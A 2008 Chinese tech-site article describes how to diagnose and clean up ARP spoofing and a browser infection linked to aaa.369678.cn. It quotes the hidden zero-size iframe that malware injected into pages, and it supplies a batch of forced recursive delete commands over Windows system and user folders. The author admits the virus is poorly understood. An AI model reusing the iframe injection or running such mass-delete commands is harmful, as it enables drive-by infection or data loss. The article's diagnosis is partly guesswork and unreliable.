科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道aaa.369678.cn和ARP病毒的分析解决

aaa.369678.cn和ARP病毒的分析解决

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

最近在客户那里遇到了这个病毒:aaa.369678.cn,由于网络同时还存在ARP攻击的状况,导致整个网络陷入瘫痪,所以这里就一并分析解决。

作者:zdnet安全频道 来源:论坛整理 2008年6月21日

关键字: ARP病毒 aaa.369678.cn

  • 评论
  • 分享微博
  • 分享邮件
最近在客户那里遇到了这个病毒:aaa.369678.cn,由于网络同时还存在ARP攻击的状况,导致整个网络陷入瘫痪,所以这里就一并分析解决。

  一、ARP 攻击及其相关 ARP病毒、木马的简单处理:
杀毒的办法这里就不详细介绍了,推荐几款杀毒软件:Macfee、Avira AntiVir PersonalEdition、Symantec AntiVirus v10.2等。 其中Macfee、Symantec软件比较适合双核大内存的电脑使用,如果你的配置是单核的,还是用Avira AntiVir PersonalEdition吧,效果不错,我就是用这个。 国产的杀毒软件当然也可以。企业环境特别是Win2003域的环境下,Symantec的企业版是比较好的选择。 呵呵,说了这么多啰唆的话,有点跑题了。


【表现的症状】:
a、无法上网或者上网很慢

b、ping网关的时候反应很慢:

正常的时候是这样的:
Reply from 192.168.1.1: bytes=32 time=1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time<1ms TTL=64
Reply from 192.168.1.1: bytes=32 time=1ms TTL=64

被ARP攻击的时候,常常 time 值会达到几百、几千、甚至干脆丢包:Request timed out.

c、查看本机的ARP映射表,会发现本机的网关MAC地址跟别的正常电脑不一样:
arp -a
192.168.1.1          00-08-5c-b0-8c-3d    Dynamic

【解决办法】
1、进入命令行方式:
    开始-》运行-》cmd

2、在客户机上建立网关(路由器)的静态ARP映射:
    arp  -s  <网关IP>  <网关MAC地址>

上面两步可以保证你在重启前能上网……  那重启后呢? ………… 这个,由于黔驴技穷,暂时只是用批处理的方法来进行的。 把以下命令复制到命令行运行:

cd /d %ProgramFiles%
echo @echo off  >> AntiARP.BAT
echo arp  -s  网关IP  网关MAC地址 >> AntiARP.BAT

    这时在你的c盘program files下面会生成一个 AntiARP.BAT 文件,右键单击 “发送到”-》“桌面快捷方式”。 接着把生成的快捷方式复制到 开始菜单 -》 所有程序 -》启动 里面。这样,每次启动的时候就会自动运行静态映射命令。

  至于怎么把快捷方式复制到“启动”文件夹,如此“高难度”的问题实在不适合在这里讲解,你要真不会就发Email给我:finaltry@sina.com.cn

    怎样才能获得网关的IP地址、网关的MAC地址?这个可以直接到路由器上看,也可以借助一个叫“Anti Arp Sniffer V2.0”的软件,在这里下载:
Anti Arp Sniffer V2.0
www.newjian.com

二、清理aaa.369678.cn病毒。
【表现症状】
    此病毒非常可恶,它会让你的IE浏览器每次打开网站的时候都连接到 aaa.369678.cn 网站,并且从这个网站下载多种木马、病毒,让你现有杀毒软件(卡巴斯基、avest等)不断地跳出病毒提示,严重拖慢浏览速度,并最终导致IE崩溃。
    分析网页代码,发现每个页面都有如下代码:
    <iframe src="http://aaa.369678.cn/****.htm" width="0" height="0"></iframe>
用“奇虎360”、超级兔子等常规软件扫描,没有发现异常。 可每次开IE浏览的时候都会如此。上网找了一些资料后才把它摆平。

【解决办法】
1、进入系统的安全模式(注意:是带网络连接的)
    如果你的安全模式被破坏,请用System Repair Engineer修复你的安全模式。

2、打开“任务管理器”

3、把以下内容复制或者新建一个批处理文件:
@echo off
echo 正在清理,请稍等......
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
rd /s/q %temp% & md %temp%
rd /s/q "%userprofile%\Local Settings\Temporary Internet Files"

4、在“任务管理器”的“进程”页面,结束Explorer.exe 进程,然后把上面 3、的命令黏贴到命令行方式执行或者保存为批处理文件再执行!

5、收工。

【备注】此病毒有点特别,工作原理还不是很清楚,好像不是浏览器劫持,全面修复IE后依然无效。估计是网络内部有电脑中毒了,然后利用系统的漏洞不断攻击其他电脑。
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章